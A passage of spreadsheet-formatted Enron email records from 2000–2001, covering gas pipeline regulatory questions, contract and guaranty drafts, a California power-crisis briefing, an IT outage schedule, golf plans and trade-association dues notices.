08:37 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Rebecca W Cantrell                           08/09/2000 07:39 PM_x000D_
	_x000D_
_x000D_
To: John Hodge/Corp/Enron@ENRON, Judy Townsend/HOU/ECT@ECT, Victor _x000D_
Lamadrid/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, Robert Superty/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Iroquois Gas_x000D_
_x000D_
As noted in the Order 637 summary you received a couple of weeks ago, _x000D_
Iroquois Gas is proposing to limit overlapping nominations on segmented _x000D_
capacity.  Shippers will only be able to overlap segments to the extent the _x000D_
overlapped segment is within the path of both the releasing and replacement _x000D_
shipper.  Iroquois has made a number of arguments (some persuasive, some not) _x000D_
about why any other procedure is operationally infeasible.  For instance, _x000D_
they state that they would have to eliminate umbrella accounts because the _x000D_
process of reviewing contracts for interrelated releases would be too lengthy _x000D_
to complete within GISB timelines._x000D_
_x000D_
Is this issue of major concern to any of you in transacting daily business on _x000D_
Iroquois' system?  Have we tried to do any segmenting outside of the paths?_x000D_
_x000D_
Please give me a call at X.35840 by Friday morning if we should file comments _x000D_
on this issue.  I did not see anything else of significance in their filing._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 09:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Equity adjustments</t>
  </si>
  <si>
    <t xml:space="preserve">Sally,_x000D_
_x000D_
I reviewed the salaries of my team with Hector.  Based on this discussion, I _x000D_
recommend the following:_x000D_
_x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Thanks_x000D_
Sheri </t>
  </si>
  <si>
    <t>Thu, 24 May 2001 07:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cegann@dow.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Will do....have a great game!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Gann, Christopher (CE)" &lt;CEGANN@dow.com&gt; on 05/24/2001 01:39:21 PM_x000D_
To: "'Stanley.Horton@enron.com'" &lt;Stanley.Horton@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: Sunday Golf at Rav_x000D_
_x000D_
_x000D_
Cindy,_x000D_
Thank you...please alert Stan that I will be there._x000D_
Regards, Chris_x000D_
-----Original Message-----_x000D_
From: Stanley.Horton@enron.com [mailto:Stanley.Horton@enron.com]_x000D_
Sent: Thursday, May 24, 2001 1:20 PM_x000D_
To: DFS International, Inc.; CEGANN@dow.com_x000D_
Subject: Re: Sunday Golf at Rav_x000D_
Importance: High_x000D_
_x000D_
_x000D_
_x000D_
Hello!    Stan asked that I advise you of Sunday's (May 27) golf details at_x000D_
Raveneaux Country Club, as follows:_x000D_
_x000D_
   Stan Horton_x000D_
   Chris Gann_x000D_
   Steve Westlund_x000D_
   Julie Westlund_x000D_
_x000D_
Tee time is 8:15AM on the Old Course off #1.  Don't hesitate to call me if_x000D_
you have any questions or concerns._x000D_
_x000D_
Thanks,_x000D_
Cindy (Stan's assistant)_x000D_
713/853-6197_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"DFS International, Inc." &lt;dfsintl@swbell.net&gt; on 05/23/2001 11:09:14 AM_x000D_
_x000D_
To:   stanley.horton@enron.com_x000D_
cc:   cegann@dow.com_x000D_
_x000D_
Subject:  Sunday Golf at Rav_x000D_
_x000D_
_x000D_
After negotiations with my better half,  I will be ready to play Sunday._x000D_
My wife Julie is also willing to play on Sunday and we are trying to_x000D_
arrange_x000D_
for a baby sitter.  Either way,  I will be there.  Please let me know the_x000D_
time when it comes available.  Thank you._x000D_
_x000D_
Best regards._x000D_
Steve Westlund_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 01:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>New Product Description</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Patrice L Mims/HOU/ECT on 09/13/2000 _x000D_
08:04 AM ---------------------------_x000D_
_x000D_
_x000D_
Patrice L Mims_x000D_
09/12/2000 05:06 PM_x000D_
To: Melba Lozano/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: New Product Description_x000D_
_x000D_
_x000D_
_x000D_
Hey Melba, _x000D_
_x000D_
This is the description I need for the new product:_x000D_
_x000D_
The interconnection between Alliance Pipeline Company and ANR Pipeline _x000D_
Company located in Will County, Illinois_x000D_
_x000D_
I need this product set up ASAP, so let me know._x000D_
_x000D_
Thanks so much and sorry for the rush!!!!_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 01:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'leo.lugo@enron.com'})</t>
  </si>
  <si>
    <t>please disregard previous email.</t>
  </si>
  <si>
    <t>Tue, 23 May 2000 08:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>True Quote -- Letter of Interest and Term Sheet</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. Edmonds:_x000D_
_x000D_
Per Andy Zipper's request, attached please find a final version of the letter _x000D_
of understanding and term sheet.  If the attached are acceptable, please _x000D_
print and execute two copies and forward them to me by overnight courier.  _x000D_
Enron Net Works will return to you a fully-executed copy on Enron Net Works' _x000D_
letterhead._x000D_
_x000D_
Please do not hesitate to contact me at your convenience with any comments or _x000D_
questions regarding the attached._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Travis McCullough_x000D_
Enron North America Corp._x000D_
1400 Smith Street EB 3817_x000D_
Houston Texas 77002_x000D_
Phone:  (713) 853-1575_x000D_
Fax: (713) 646-3490      </t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 14:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'phil.demoes@enron.com'})</t>
  </si>
  <si>
    <t>Transco</t>
  </si>
  <si>
    <t>John,_x000D_
_x000D_
Is there a way I can check to see what releases are going for on Transco for this summer?  (ie you have a Transit password I could use over the internet?)_x000D_
_x000D_
Oglethorpe was interested in what capacity values were going for.  In particular, for June-Aug 01.</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 14:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'anne.bike@enron.com', 'jennifer.bagwell@enron.com', 'monique.sanchez@enron.com'})</t>
  </si>
  <si>
    <t>PG&amp;E Citygate Basis position for January</t>
  </si>
  <si>
    <t>The PG&amp;E basis position in TDS does not match the FEB/MAR position.  The Baja _x000D_
spread was executed as a NOV-MAR position months ago. The only real changes _x000D_
were to Socal basis over time. There is no telling when this might have _x000D_
changed in error.  Will you please research the position to see when this _x000D_
position was reduced.  I am guessing that a park and loan was executed by _x000D_
Frank Ermis at some point and the basis risk was allocated to GD New by _x000D_
mistake.  _x000D_
_x000D_
Thanks,_x000D_
Mike</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 08:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FREE TWO-WEEK TRIAL to Platts Energy Trader</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/23/2001 _x000D_
04:18 PM ---------------------------_x000D_
_x000D_
_x000D_
"The Power Marketing Association" &lt;pma-marketplace@mgfairfax.rr.com&gt; on _x000D_
03/22/2001 09:41:10 AM_x000D_
To: _x000D_
cc:  _x000D_
Subject: FREE TWO-WEEK TRIAL to Platts Energy Trader_x000D_
_x000D_
_x000D_
_x000D_
Dear Energy Professional:_x000D_
_x000D_
We are pleased to start you today on a FREE TWO-WEEK TRIAL to Platts Energy _x000D_
Trader, providing comprehensive daily market coverage of both natural gas and _x000D_
electricity in the converging North American energy market. Today's issue is _x000D_
attached below._x000D_
_x000D_
Platts Energy Trader is brought to you by the editors of Inside FERC's Gas _x000D_
Market Report and Power Markets Week, both published by Platts, the energy _x000D_
market information division of The McGraw-Hill Companies._x000D_
_x000D_
Platts Energy Trader will put on your desktop each morning the best market _x000D_
reporting available on North American electricity and gas, along with unique _x000D_
coverage such as forward assessments, regional spark spreads and integrated _x000D_
market commentary. It will give you critical context in today's rapidly _x000D_
converging energy marketplace._x000D_
_x000D_
Valuable and Unique Features Include:_x000D_
_x000D_
* Daily assessments of the forward electricity market at six key hubs _x000D_
extending out more than a year._x000D_
* Near-term forward power deals-the most data and products covered in the _x000D_
industry._x000D_
* First-of-a-kind spark spreads based on actual efficiency rates for power _x000D_
plants in specific regions, a unique hedging and analysis tool._x000D_
* Expanded daily natural gas spot prices at more than 60 locations, including _x000D_
11 new market area points._x000D_
* 24 on-peak and 21 off-peak daily electricity indexes._x000D_
* The most frequent and comprehensive power outage tables found anywhere._x000D_
* Daily key indicators for national forward electric power prices and _x000D_
national supply area gas prices._x000D_
* Succinct national overview of gas and power markets, and how they're _x000D_
interacting._x000D_
* Three regional sections, providing focused coverage for traders, along with _x000D_
leading news._x000D_
* Cumulative averages of daily prices throughout the calendar month for all _x000D_
gas pricing and all on-peak daily electricity indexes._x000D_
_x000D_
For questions, call our sales department at 877-286-8897 or 212-904-2004; _x000D_
e-mail, info@platts.com._x000D_
_x000D_
Meanwhile, we hope you enjoy your free two-week trial to Platts Energy Trader._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
_x000D_
_x000D_
Richard Schwartz_x000D_
Platts Marketing Director_x000D_
_x000D_
P.S.-Want to subscribe now? Call 877-286-8897 or 212-904-2004. The annual _x000D_
subscription_x000D_
price for this comprehensive daily package of both natural gas and _x000D_
electricity market_x000D_
intelligence is just $1,495, a $500 savings off the regular subscription rate _x000D_
of $1,995_x000D_
(plus applicable sales tax, Canadian GST or VAT)._x000D_
_x000D_
If you need to download Acrobat Reader to read this file, go to www.adobe.com._x000D_
To decline free trial of Platts Energy Trader, hit reply and type "stop trial._x000D_
_x000D_
_x000D_
 - et032201.pdf_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 04:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Alberta Prepay Transaction - Royal Bank of Canada Interest Rate_x000D_
 Swap</t>
  </si>
  <si>
    <t>Joe, I just received a copy of RBC's form of the confirmation for the rate _x000D_
swap we did relating to the Alberta Prepay transaction.  I remember last week _x000D_
having our form of rate swap confirm executed and sent back to you.  I assume _x000D_
that this is simply a matter of RBC's confirm desk automatically generating _x000D_
and sending a confirm and that we will be relying on the confirm that Enron _x000D_
prepared and sent as the governing document regarding the rate swap.  Can you _x000D_
confirm that point for me?  Also, have you seen executed copies of the _x000D_
various RBC and TD Bank confirms yet?  I have received a fully executed copy _x000D_
(by fax) of the RBC commodity swap, but that is it to date._x000D_
_x000D_
Cheers_x000D_
_x000D_
Greg</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 05:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'emily.sellers@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'lee.huber@enron.com', 'staci.spalding@enron.com', 'dari.dornan@enron.com', 'frazier.king@enron.com', 'kathy.ringblom@enron.com', 'dorothy.mccoppin@enron.com', 'peggy.phillips@enron.com', 'louis.soldano@enron.com', 'philip.crowley@enron.com', 'maria.pavlou@enron.com', 'colleen.raker@enron.com', 'drew.fossum@enron.com', 'candace.kyle@enron.com', 'jim.talcott@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the monthly report.  Please send me any additions or changes you _x000D_
might have as soon as possible._x000D_
_x000D_
  Thanks._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2000 12:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Legal stuff</t>
  </si>
  <si>
    <t xml:space="preserve">Tana -- with regard to the message below, DMBB has signed and overnighted the _x000D_
agreeement to me.  _x000D_
_x000D_
Kal_x000D_
_x000D_
---------------------- Forwarded by Kal Shah/HOU/ECT on 04/26/2000 07:40 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kal Shah                           04/26/2000 06:37 PM_x000D_
	_x000D_
_x000D_
To: Tana Jones/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Legal stuff_x000D_
_x000D_
Tana -- Here's the DMBB contract with the name and address info. you needed.  _x000D_
We do not have an executed copy from them yet.  However, I think we can get _x000D_
them to sign this contract by next week.   Mark Holsworth helped develop this _x000D_
agreement.  _x000D_
_x000D_
Kal_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 14:19:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>Supplemental Weekend Outage Report for 10-12-01 through 10-14-01</t>
  </si>
  <si>
    <t>_x000D_
------------------------------------------------------------------------------------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
October 12, 2001 5:00pm through October 15, 2001 12:00am_x000D_
------------------------------------------------------------------------------------------------------_x000D_
_x000D_
SCHEDULED SYSTEM OUTAGES: _x000D_
_x000D_
ARDMORE DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
AZURIX: No Scheduled Outages._x000D_
_x000D_
EB34 DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
EDI SERVER: No Scheduled Outages._x000D_
_x000D_
EES:     _x000D_
_x000D_
Impact:  EES_x000D_
Time:  Sat 10/13/2001 at  2:00:00 PM thru Sat 10/13/2001 at  5:00:00 PM_x000D_
Outage:  Netfinity upgrade on EES Lotus Notes - Server name EESHOU-LN11 &amp; EESHOU-LN12_x000D_
Disruption:  Intermittent Disruption of Service_x000D_
Environments Impacted:  EES_x000D_
Purpose: _x000D_
Backout: Uninstall monitoring tools._x000D_
Contact(s): 	Animesh Solanki  713-853-5147  _x000D_
		Roderic H Gerlach    _x000D_
		    		 _x000D_
ENRON CENTER SOUTH DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages_x000D_
_x000D_
ENRON NORTH AMERICAN LANS:    SEE ORIGINAL REPORT_x000D_
_x000D_
FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET: No Scheduled Outages._x000D_
_x000D_
MESSAGING:      SEE ORIGINAL REPORT_x000D_
 _x000D_
MARKET DATA: No Scheduled Outages._x000D_
_x000D_
NT: No Scheduled Outages._x000D_
_x000D_
OS/2:  No Scheduled Outages._x000D_
_x000D_
OTHER SYSTEMS:    SEE ORIGINAL REPORT_x000D_
 _x000D_
SITARA:    SEE ORIGINAL REPORT_x000D_
_x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY:    SEE ORIGINAL REPORT_x000D_
 _x000D_
TERMINAL SERVER:  No Scheduled Outages._x000D_
_x000D_
UNIFY:  No Scheduled Outages._x000D_
_x000D_
-----------------------------------------------------------------------------------------------------------------------------_x000D_
								FOR ASSISTANCE_x000D_
_x000D_
(713) 853-1411   Enron Resolution Center_x000D_
_x000D_
_x000D_
Specific Help:_x000D_
Information Risk Management			(713) 853-5536_x000D_
SAP/ISC                                                                               (713) 345-4727_x000D_
Unify On-Call 					(713) 284-3757  [Pager]_x000D_
Sitara On-Call					(713) 288-0101  [Pager]_x000D_
RUS/GOPS/GeoTools/APRS			(713) 639-9726  [Pager]_x000D_
OSS/UA4/TARP				(713) 285-3165  [Pager]_x000D_
CPR						(713) 284-4175  [Pager]_x000D_
EDI Support 					(713) 327-3893  [Pager]_x000D_
EES Help Desk					(713)853-9797 OR (888)853-9797_x000D_
TDS -Trader Decision Support On-Call                    (713) 327-6032 [Pager]</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 06:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Confidentiality Agreement</t>
  </si>
  <si>
    <t>&lt;&lt;2S4_01!.DOC&gt;&gt;_x000D_
_x000D_
We have enclosed a proposed Confidentiality Agreement between Enron North_x000D_
America Corp. and NRG Thermal Corporation.  Revised drafts of the Letter_x000D_
Agreements and the LLC Agreement will follow later today.  Thank you._x000D_
_x000D_
Carolyn M. Campbell_x000D_
King &amp; Spalding_x000D_
713-276-7307 (phone)_x000D_
713-751-3280 (fax)_x000D_
ccampbell@kslaw.com &lt;mailto:ccampbell@kslaw.com&gt;_x000D_
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 2S4_01!.DOC</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 00:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'scrilla364@aol.com', 'eric.bass@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Thought you both would appreciate this one- with both of your "women drivers" _x000D_
comments all the time._x000D_
---------------------- Forwarded by Shanna Husser/HOU/EES on 11/06/2000 08:37 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Jason Sharp@ECT_x000D_
11/02/2000 10:08 AM_x000D_
To: Chris Ochoa/NA/Enron@Enron, Leon Branom/Corp/Enron@ENRON, Michelle _x000D_
LeBlanc/Corp/Enron@ENRON, Shanna Husser/HOU/EES@EES, Kathy _x000D_
Fink/Corp/Enron@ENRON, Bonne Castellano/HR/Corp/Enron@ENRON, Obed De La _x000D_
Cruz/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Joey Esperance/LON/ECT@ECT, Emily _x000D_
Allwardt/LON/ECT@ECT, Dara M Flinn/HOU/EES@EES, Sonia Balboa/NA/Enron@Enron, _x000D_
todd.wolf@luminant.com, scott.hanagriff@luminant.com_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
?????????_x000D_
 - wdrivers.JPG_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 02:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>California Update 3/27/01</t>
  </si>
  <si>
    <t>Executive Summary:_x000D_
? Undercollet Remains Sticking Point for Utility Creditors (especially QFs), _x000D_
involuntary bankruptcy likely if issue is not addressed in today's CAPUC _x000D_
hearings_x000D_
? CAPUC Rate Increase Set at 40%, Pending DWR Power Purchase Details_x000D_
? Davis Defends No Rate Increase Position, Distances Himself from CAPUC_x000D_
_x000D_
QF/Generator undercollect may be an invitation to involuntary bankruptcy_x000D_
As reported last week, QF has sitting and waiting to hear what the CAPUC has _x000D_
to say, unfortunately it may not be what the QFs want to hear.  The _x000D_
utilities' undercollect, which will not be addressed in today's CAPUC _x000D_
hearings, could very well provide an invitation for QFs and generators to _x000D_
file involuntary bankruptcy against SoCal and PG&amp;E.  Recent rate hikes _x000D_
proposed by the CAPUC specifically dictate that any revenue generated from _x000D_
rate increases cannot be used to pay off utility past debt, leaving the QF _x000D_
with little hope of recovery.  QFs were obviously dismayed by the CAPUC's _x000D_
draft order and if the decision is passed as it currently reads, an _x000D_
involuntary bankruptcy filing is still likely._x000D_
_x000D_
CAPUC holds rate increase hearings today_x000D_
As reported yesterday, Loretta Lynch released the details of the CAPUC's _x000D_
draft rate increase order last night.  There is expected to be a 3 cent/kwh _x000D_
surcharge on power bills or roughly a 40% rate increase.  A portion of this _x000D_
"surcharge" will be given to the DWR to cover its costs and the order _x000D_
concludes that utilities need revenues on a going-forward basis.  Therefore, _x000D_
utilities can only use the revenues for power purchases going forward and are _x000D_
expressly forbidden from using this cash to pay down past debt (ex. QFs).  _x000D_
However, the utilities are ordered to resume payments to the QFs on a _x000D_
going-forward basis.  The net effect of the order is to allow the utilities _x000D_
to operate in case of bankruptcy._x000D_
_x000D_
One interesting point in the draft is its decision which calls on the _x000D_
utilities to join  with the state in pursuing a refund on the amount _x000D_
overcharged for power by the generators.  The suggestion is that the _x000D_
utilities take legal action against the generators to recoup funds.  Only the _x000D_
funds recovered from generators can be used to pay down the utilities' past _x000D_
debt.  If the utilities choose this course of action, it would be a very _x000D_
lengthy process._x000D_
  _x000D_
Davis contends with Lynch on CAPUC rate increases._x000D_
Davis has thus far refused to support CAPUC's proposed rate increase stating _x000D_
the CAPUC decision making board is an independent body and that he continues _x000D_
to believe that a resolution can be found within the current rate structure.  _x000D_
Sources indicate that he is likely to ask for Lynch's letter of resignation, _x000D_
however, there is no indication she will comply.  Senator Burton, who _x000D_
supports the CAPUC's plan, reportedly will protect Lynch by not allowing her _x000D_
to be impeached (which is the only other way she could be removed by the _x000D_
governor).</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 07:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Blue Range Resource Corporation</t>
  </si>
  <si>
    <t>Peter_x000D_
_x000D_
Just wanted to let you know that all the great work in Blue Range is paying _x000D_
off in the US - citing Blue Range, a Houston bankruptcy court correctly _x000D_
decided that a gas contract was a forward contract relative to the US safe _x000D_
harbor provisions.  If you want a copy of the opinion let me know._x000D_
_x000D_
Hope all is well._x000D_
_x000D_
Elizabeth  713 853 6349</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 08:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RICE/ENRON FINANCE SEMINAR SERIES</t>
  </si>
  <si>
    <t xml:space="preserve">http://jonesgsm.rice.edu/_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/23/2001 _x000D_
04:59 PM ---------------------------_x000D_
_x000D_
_x000D_
Barbara Ostdiek &lt;ostdiek@rice.edu&gt; on 03/22/2001 04:46:53 PM_x000D_
To: ostdiek@rice.edu_x000D_
cc:  _x000D_
Subject: RICE/ENRON FINANCE SEMINAR SERIES_x000D_
_x000D_
_x000D_
A copy of Paul Schultz's paper, "Who Makes the Market," is now_x000D_
available.  The paper to can be obtained (by Monday for sure) from Felicia_x000D_
Jones (Economics), Latha Ramchand (University of Houston), and Vince_x000D_
Kaminski (Enron) or Barbara Ostdiek (everyone else)._x000D_
_x000D_
Paul's seminar is Friday, March 30, at 3:30 in Room 201 (note the room _x000D_
change)._x000D_
_x000D_
The abstract of the paper is copied below:_x000D_
_x000D_
Abstract_x000D_
_x000D_
"I provide evidence that Nasdaq dealers make markets in the stocks in which_x000D_
they receive order flow.  Several variables used to proxy for the stocks_x000D_
that individual market maker's brokerage customers would trade, including_x000D_
trading volume, location, underwriting participation and analyst coverage,_x000D_
are significant determinants of market marking activity.  Informational_x000D_
advantages may also be a factor in the market making decision as evidenced_x000D_
by dealers specializing in stocks in specific industries.  Some potential_x000D_
problems that arise when researchers ignore the integration of market_x000D_
making with brokerage, securities analysis and underwriting businesses are_x000D_
discussed."_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 20:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mcfam@andrews-kurth.com'})</t>
  </si>
  <si>
    <t>Re: Hawaii II Guaranty</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a clean draft Guaranty for Enron Corp.  A marked copy will be _x000D_
sent out first thing this morning. The guaranty incorporates Mayer Brown's _x000D_
comments.  In addition, a notice provision has been built into Section 1(A) _x000D_
and a reservation of defenses provision has been added to Section 3.  _x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 15:13:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: TW presentation</t>
  </si>
  <si>
    <t xml:space="preserve">Some minor changes to the pages, nothing major.   Corrected some numbers to improve accuracy._x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Carter, Rebecca  _x000D_
Sent:	Friday, April 20, 2001 4:46 PM_x000D_
To:	Hayslett, Rod_x000D_
Subject:	TW presentation_x000D_
_x000D_
See changes, let me know if you have questions or comments._x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 02:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Credit Report--2/20/01</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 02/20/2001 _x000D_
10:11 AM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Veronica Espinoza @ ENRON                                              _x000D_
               02/20/2001 09:38 AM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Larry Joe Hunter/HOU/ECT@ECT, Bob Bowen/HOU/ECT@ECT, Kim S _x000D_
Theriot/HOU/ECT@ECT, Melinda Whalen/CAL/ECT@ECT, Dianne Seib/CAL/ECT@ECT, _x000D_
Janie Aguayo/HOU/ECT@ECT, Derek Bailey/Corp/Enron@ENRON, Kevin _x000D_
Meredith/Corp/Enron@ENRON, Ellen Wallumrod/NA/Enron@ENRON, Celeste _x000D_
Cisneros/NA/Enron@Enron, Diane Anderson/NA/Enron@Enron, Tiffany _x000D_
Williams/NA/Enron@Enron, Cindy Feldman/CAL/ECT@ECT, Patricia _x000D_
Boulanger/CAL/ECT@ECT, Linda Sietzema/CAL/ECT@ECT, Sharon _x000D_
Crawford/CAL/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Tanya _x000D_
Rohauer/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, _x000D_
Russell Diamond/HOU/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, Nidia _x000D_
Mendoza/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, _x000D_
David Baumbach/HOU/ECT@ECT, Errol McLaughlin/Corp/Enron@ENRON, Darron C _x000D_
Giron/HOU/ECT@ECT, Walter Guidroz/NA/Enron@Enron, Leslie Reeves/HOU/ECT@ECT, _x000D_
Veronica Gonzalez/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Jean _x000D_
Bell/HOU/ECT@ECT, Ken Curry/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Credit Report--2/20/01_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 03:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.neustaedter@enron.com', 'michael.tribolet@enron.com', 'jeffrey.soo@enron.com'})</t>
  </si>
  <si>
    <t>DRW credit accumulation</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 05/11/2001 10:58 AM -----_x000D_
_x000D_
	Michael Tribolet/ENRON@enronXgate_x000D_
	05/09/2001 03:58 PM_x000D_
		 _x000D_
		 To: Jeff Dasovich/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: DRW credit accumulation_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 07:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bfpjv@c-zone.net', 'gdonald386@aol.com', 'taschehoug@thermoecotek.com', 'mcmannes@aol.com', 'randall.kob@prudential.com', 'kfickett@usgen.com', 'rescalante@riobravo-gm.com', 'jackp@calpine.com', 'jluckhardt@dbsr.com', 'stan.marks@nrgenergy.com', 'siliff@riobravo-gm.com', 'hedsf@aol.com', 'elozowicki@sjo.coudert.com', 'plenv01@northcoast.com', 'al.jensen@nrgenergy.com', 'john.mcconomy@us.pwcglobal.com', 'kwilliams@envres.org', 'fmisseldine@caithnessenergy.com', 'kbssac@aol.com', 'jornl@forasenergy.com', 'marc.tompkins@bently.com', 'jwood@sithe.com', 'lale@dynegy.com', 'agilford@wbcounsel.com', 'rpelote@energy.twc.com', 'smara@enron.com', 'steve_ponder@fpl.com', 'nam.nguyen@powersrc.com', 'rjhickok@duke-energy.com', 'dnelsen@gwfpower.com', 'hawkins@2000energy.com', 'purenergyi@aol.com', 'cody.carter@williams.com', 'lynch@sl.net', 'wfhall2@duke-energy.com', 'john_h_stout@reliantenergy.com', 'freesrj@apci.com', 'emaddox@seawestwindpower.com', 'billw@calpine.com', 'eric.eisenman@neg.pge.com', 'gtbl@dynegy.com', 'dean_gosselin@fpl.com', 'mkramer@akingump.com', 'khoffman@caithnessenergy.com', 'frank.derosa@gen.pge.com', 'snoll@thermoecotek.com', 'hellertj@apci.com', 'jmhpower@aol.com', 'gsheere2@iccnet.com', 'sangorgon@aol.com', 'rllamkin@seiworldwide.com', 'efeo@milbank.com', 'twetzel@thermoecotek.com', 'wscobee@caithnessenergy.com', 'marty_mcfadden@ogden-energy.com', 'bellery@spi-ind.com', 'jdasovic@enron.com', 'wcarlson@wm.com', 'difellman@energy-law-group.com', 'joe.greco@uaecorp.com', 'rboyd@enron.com', 'cabaker@duke-energy.com', 'jim_bishop@msn.com', 'paula_soos@ogden-energy.com', 'bill.barnes@lgeenergy.com', 'bbuchynsky@aol.com', 'curt.hatton@gen.pge.com', 'armen.arslanian@gecapital.com', 'dparque@ect.enron.com', 'elliottsa@earthlink.net', 'joer@calpine.com', 'jweisgall@aol.com', 'curtis_l_kebler@reliantenergy.com'})</t>
  </si>
  <si>
    <t>Outstanding Accounts Payable to IEP From Members</t>
  </si>
  <si>
    <t>As you are aware, IEP has endured a number of staff  changes over the past _x000D_
few months, primarily in the accounting/office management  functions.? As a _x000D_
result, we have been delinquent in sending invoices to  member companies for _x000D_
their dues and/or special fund commitments?made during  the year 2000.? _x000D_
However, we also have been modifying our accounts payable  (AP) and accounts _x000D_
receivable (AR) procedures, essentially shifting the tracking  of these _x000D_
accounts to our external accountant.? _x000D_
?_x000D_
Accordingly, our external accountant (Dan Ross  Accountancy) will be sending _x000D_
invoices to IEP members for outstanding dues and/or  special fund commitments _x000D_
which have yet to be paid.? Some of these amounts  may be for commitments _x000D_
last spring.? We ask your indulgence as we become  current.? Some _x000D_
commitments/checks may have slipped through the cracks  during this period.? _x000D_
?_x000D_
We thank you for your patience and prompt response  to the invoices you will _x000D_
